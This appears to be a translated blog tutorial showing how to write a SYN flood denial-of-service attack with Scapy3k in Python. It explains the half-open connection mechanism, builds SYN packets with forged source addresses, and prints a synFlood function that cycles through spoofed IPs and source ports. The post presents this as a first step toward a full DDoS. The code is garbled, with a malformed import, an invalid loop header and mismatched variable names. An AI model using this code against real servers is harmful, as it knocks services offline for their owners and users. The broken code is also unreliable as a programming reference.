Python3 version of Scapy - Scapy3k to implement a simple DDos.
First of all, implement the SYN flood attack (SYN Flood, one of the DOS methods that has been commonly used, by sending a large number of forged TCP connection requests, so that the attacked host resource depletion attack). the process of the TCP three handshakes will not be repeated here, the SYN attack is the client to the server to send SYN messages after the server no longer responds to the server's response to the message, due to server In processing TCP requests, the protocol stack will leave a buffer to store the handshake process, if more than a certain period of time did not receive the client's message, then the connection in the protocol stack to store the data will be discarded. Attackers who take advantage of this time to send a large number of connection requests, all hanging in the half-connection state, which will continue to consume server resources until the denial of service.
Scapy is a powerful interactive packet handler that can be used to send, sniff, parse and forge network packets. First you need to install Scapy3k:
sudo pip3 install scapy-python3
Now learn how scapy is used:
sudo scapy (scapy requires root privileges to send packets)
(The warning message is because there are some dependencies that are not installed, but I won't install them since we don't need to use them for this experiment)
Now let's construct a simple packet using Scapy and see:
pkt = IP(dst = "192.168.0.10")
Next we construct a SYN packet:
pkt = IP(src="202.121.0.12",dst="192.168.0.100")/TCP(dport=80,flags="S")
(We constructed an IP packet and a TCP packet and combined them into one piece so that we have a complete TCP packet, which otherwise could not be sent out, in the IP packet we specified the source IP address src and the destination IP address dst, where src is the address that we forged, and the value of the flags was set to S to indicate that the packet to be sent is a SYN packet.)
Code Implementation:
The specific code is as follows:
import random
import import *
def synFlood(tgt,dPort):
srcList = ['201.1.1.2','10.1.1.102','69.1.1.2','125.130.5.199']
from sPort in range(1-24,65535):
index = (4)
ipLayer = IP(stc = stcList[index].dst = tgt)
tcoLayer = TCP(sport = sPort,dport = dPort,flags = "S")
packet = ipLayer/tcpLayer
send(packet)
The srcList is defined to hold the forged IP address, and then a loop is defined to change the source port each time a packet is sent. You can see that when constructing the TCP packet we added a parameter, sport, and the port number that changes in the loop is given to the parameter, sport. We also call the () function to randomly get a fake IP address from the srcList. This experiment is complete, the next experiment to implement a complete Ddos process.
Above this Python project Scapy-based implementation of SYN flooding attack is all I have to share with you, I hope to be able to give you a reference, and I hope you will support me more.